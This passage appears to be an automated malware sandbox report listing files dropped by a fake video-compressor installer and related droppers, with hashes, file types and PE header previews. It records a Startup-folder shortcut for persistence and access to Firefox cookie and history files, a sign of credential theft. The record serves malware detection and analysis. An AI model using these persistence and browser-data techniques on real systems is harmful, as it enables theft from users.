                                                                                                                                                                                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Nikko Video Compressor\nikkovideocompressor32.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):2801664
                                                                                                                                                                                                                                Entropy (8bit):6.6798536856841375
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:lwWPibKnJknp/+ZcGBA6U2ihgNv7jkYntZ+1yDPFvxkPwQCw6xVw6:igcac9PgNDjkYnDDPFvxkPwQCw6xl
                                                                                                                                                                                                                                MD5:88358DF4622A848ED7CAC0AB99820809
                                                                                                                                                                                                                                SHA1:6BCD70B11E11EB331E9DFA362BB61BE6CBAD2F61
                                                                                                                                                                                                                                SHA-256:F6AF841921CE9280F3336F58A20C1862EA2F5C7AB844751F1A212EDE573A3D9B
                                                                                                                                                                                                                                SHA-512:6A087A6718D8A0953B20778166EB00DD1B46E154EF4737D0F4DDD07B77AB44A1BF03264BB295477E1D9604AC212C21540FBE05028A0A9A07403330DA872F3E80
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[R.L..................".........t."......."...@...........................*......+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):392048
                                                                                                                                                                                                                                Entropy (8bit):6.542831007177094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                                                                                                                                                                                MD5:EE856A00410ECED8CC609936D01F954E
                                                                                                                                                                                                                                SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                                                                                                                                                                                SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                                                                                                                                                                                SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-RB7TG.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):719521
                                                                                                                                                                                                                                Entropy (8bit):6.515812559418536
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byOHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErKn
                                                                                                                                                                                                                                MD5:AAD4748180D644C039A9B3A8F8744CC5
                                                                                                                                                                                                                                SHA1:C38D5F7DF518EC21FAF6BCD34DBBAFCB776D73FE
                                                                                                                                                                                                                                SHA-256:AC19D5CE61849FA2B090025C3DDA36B14441E3DC99B22CB022251353C9FC2198
                                                                                                                                                                                                                                SHA-512:E8AA63191A8E4159E295539214E376DF63BF8DB9AF0829D0E338069783BFC767754238F3AB0875A45F3D99CE9B86895CD0E2D2519F8631E3E5C7FDB26E314E44
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.dat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:InnoSetup Log Nikko Video Compressor, version 0x30, 4533 bytes, 066656\user, "C:\Users\user\AppData\Local\Nikko Video Compressor"
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4533
                                                                                                                                                                                                                                Entropy (8bit):4.635471429015311
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5sdWIl4488GpZPtoDlgX9H+eOIhcfgi4cVSQs0LJqjpUyHGaVuP01yn:5sdWY448JpptobHIhcfccVSQ1Jq9UyHA
                                                                                                                                                                                                                                MD5:81542DFC8E186DB877FF30FF96E8857F
                                                                                                                                                                                                                                SHA1:D36398B240E924FE3ED2DDB488C016E5BD0F9C2F
                                                                                                                                                                                                                                SHA-256:D996D3C38BCC417244B491E5D663BD5D79EA4A1B6959DEFEA186532C1C8E1324
                                                                                                                                                                                                                                SHA-512:51147CDD6387CDF8A058B41E10F820E97D2ADE0B63EA014BCD94C662C712BFAE997750F81E461DB74174BB8F32C547E675C06CF7F987C3DBAA0F87C8C8D71AB7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b)....................................Nikko Video Compressor..........................................................................................................Nikko Video Compressor..........................................................................................................0...........%................................................................................................................o4.........o.&.......Q....066656.user2C:\Users\user\AppData\Local\Nikko Video Compressor..........."...@.. .....P......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):719521
                                                                                                                                                                                                                                Entropy (8bit):6.515812559418536
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byOHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErKn
                                                                                                                                                                                                                                MD5:AAD4748180D644C039A9B3A8F8744CC5
                                                                                                                                                                                                                                SHA1:C38D5F7DF518EC21FAF6BCD34DBBAFCB776D73FE
                                                                                                                                                                                                                                SHA-256:AC19D5CE61849FA2B090025C3DDA36B14441E3DC99B22CB022251353C9FC2198
                                                                                                                                                                                                                                SHA-512:E8AA63191A8E4159E295539214E376DF63BF8DB9AF0829D0E338069783BFC767754238F3AB0875A45F3D99CE9B86895CD0E2D2519F8631E3E5C7FDB26E314E44
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):310936576
                                                                                                                                                                                                                                Entropy (8bit):0.05651048055297013
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:e2JIkJBboEeCn8fhE85ha+M9uf5ThdA2j9Rz8OyI:e2FMhE858Q5lfz
                                                                                                                                                                                                                                MD5:4B5D1F601CF2AFDBFF68EB23FAD0123A
                                                                                                                                                                                                                                SHA1:AD3566BE4F7F7605437D8530123BBD4EC0B7DB7A
                                                                                                                                                                                                                                SHA-256:647CFB35FCAFEF994B883378F804D2BC05C3F8142300DEB8418788B137F4E674
                                                                                                                                                                                                                                SHA-512:38F45D3D2FC1AA08E6DA7D2369F46C4D07094A25396110E626D5A3D1C247F8E424D799524F8C4EF55A2E82A5002E9F0E02BBEEE8274F80B2CB54FF2B1509CEEA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|.f...........#...#.H...@...............`.....b.....................................@... .........................`....................................0..........................................................t............................text...<F.......H..................`.P`.data........`.......L..............@.`..rdata..@............b..............@.`@.eh_fram.....P.......&..............@.0@.bss....t.............................`..edata..`...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1048575
                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:42EDCF2CC7F40D636E68FBD051495010
                                                                                                                                                                                                                                SHA1:ED9D1EF2BAABCB0DC07077D898C49AD269621011
                                                                                                                                                                                                                                SHA-256:FE8EF4DA423302A33642DAE79756A7B5CC16F5A24CA61D82C2479B8A7EB14F77
                                                                                                                                                                                                                                SHA-512:FE95B973151A2F8CFF3986462D56D8368DDF53B31B45B485B5CE067787501614C657FD75300FF7BF7D1636C69E67C9EFE6F9A141CE8C3F0B8366274209D20334
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.363359036723334
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:526426126AE5D326D0A24706C77D8C5C
                                                                                                                                                                                                                                SHA1:68BAEC323767C122F74A269D3AA6D49EB26903DB
                                                                                                                                                                                                                                SHA-256:B20A8D88C550981137ED831F2015F5F11517AEB649C29642D9D61DEA5EBC37D1
                                                                                                                                                                                                                                SHA-512:A2D824FB08BF0B2B2CC0B5E4AF8B13D5BC752EA0D195C6D40FD72AEC05360A3569EADE1749BDAC81CFB075112D0D3CD030D40F629DAF7ABCC243F9D8DCA8BFBE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):708096
                                                                                                                                                                                                                                Entropy (8bit):6.507419471783474
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:33358B48CFE67C292BF76ABDDDB63947
                                                                                                                                                                                                                                SHA1:FB20D7FB9568C6719F299F379FD96A5298846F9B
                                                                                                                                                                                                                                SHA-256:824AA62860F0ACA8A2398FD97169567CA2C4E71CBCBEC1714FA333E8E1D52E4C
                                                                                                                                                                                                                                SHA-512:7E66A9FE4AC4DF83307AF6AB2F82F6CDDC9E45899F171BFE5DE763F19832EDDB3C3904D4A81F61F999EB20DC59B77E159D5EE3C6F317D9CEF811DB02686D5D36
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\service123.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):314613760
                                                                                                                                                                                                                                Entropy (8bit):0.002153493945743197
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:B7D419FC07617B934D9D062DB78C1B47
                                                                                                                                                                                                                                SHA1:DEA8D4248A027927F0EE57B114BB98B60B776F7F
                                                                                                                                                                                                                                SHA-256:3569B810E5FA7F87B796E56E5111605056E326ADC22029CF032709CF85D9386F
                                                                                                                                                                                                                                SHA-512:3F75EBD2851D5DB3291F1825068EBBF2B590F9681BE4CC7E916578A056CE122656FEC0DB2595C5D8DCFC21BA945EA87650AB961527C7038EA32B039B0E9AE948
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.f...............#.v........................@.......................................@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\twekgmwoe\todelete

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                                Entropy (8bit):5.2758810818482464
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:EDB3EF8E6687F02F90B9402499B12601
                                                                                                                                                                                                                                SHA1:E3CACDF1CBA1185C18D8F76860D906D7AD7C4539
                                                                                                                                                                                                                                SHA-256:916763E30077772A35A339BB9B6FEFD2DA58001B6B11E3450F00A6A5EAF5A0F3
                                                                                                                                                                                                                                SHA-512:23F3ABA45FBAF01A5FB730803160BD0793541E3D743553BED18250F8016CFF071EF3A9408596C53278B1AF3433AA1AA61C04DD76BA0FABF8181E2E7CF7EF666D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:["C:\\Users\\user\\Documents\\iofolko5\\XO9lsdL5g6aUibu31TDcoBrI.exegmoZLMPgmA7iERod","C:\\ProgramData\\jewkkwnf\\jewkkwnf.exe6Wob1mDxY9zsd70j"]

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Sep 21 10:34:06 2024, mtime=Sat Sep 21 10:34:06 2024, atime=Sat Sep 21 10:33:44 2024, length=4249600, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1249
                                                                                                                                                                                                                                Entropy (8bit):4.88055267227193
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:557FAF602FA05D22096DC12BB930E7DF
                                                                                                                                                                                                                                SHA1:8EAE5926A393A6F1BB61FE5F8EFC4DE35D9E635F
                                                                                                                                                                                                                                SHA-256:609BF6BA613F9C3EB237F01AB284235ABF355A108E8127789B2867054F999220
                                                                                                                                                                                                                                SHA-512:CBD55B47C801C63157D2F121E6F5AE90D6AF1279C1B3DFEFA1ADBF5752E2784BB9828FC31B0580F8516CBA750AD100CDE6AA7C70640641E88965E8ECE9587E26
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... .....*....)..*....r.........@.....................4.:..DG..Yr?.D..U..k0.&...&.......bBDj...XIm.....#..*........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG5Y/\..........................=...A.p.p.D.a.t.a...B.P.1.....5YA\..Local.<......EWsG5YA\.............................L.o.c.a.l.....N.1.....5YD\..Temp..:......EWsG5YD\.........................F...T.e.m.p.....f.1.....5YD\..POWERE~1..N......5YD\5YD\..........................(...P.o.w.e.r.E.x.p.e.r.t.N.N.T.....r.2...@.5Y7\ .POWERE~1.EXE..V......5YD\5YD\..............................P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.......q...............-.......p...........W.h......C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe....P.o.w.e.r.E.x.p.e.r.t.N.N.T.>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.........|....I.J.H..K..:...`.......X.......066656...........hT..CrF.f4... .|.E._c...,...

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
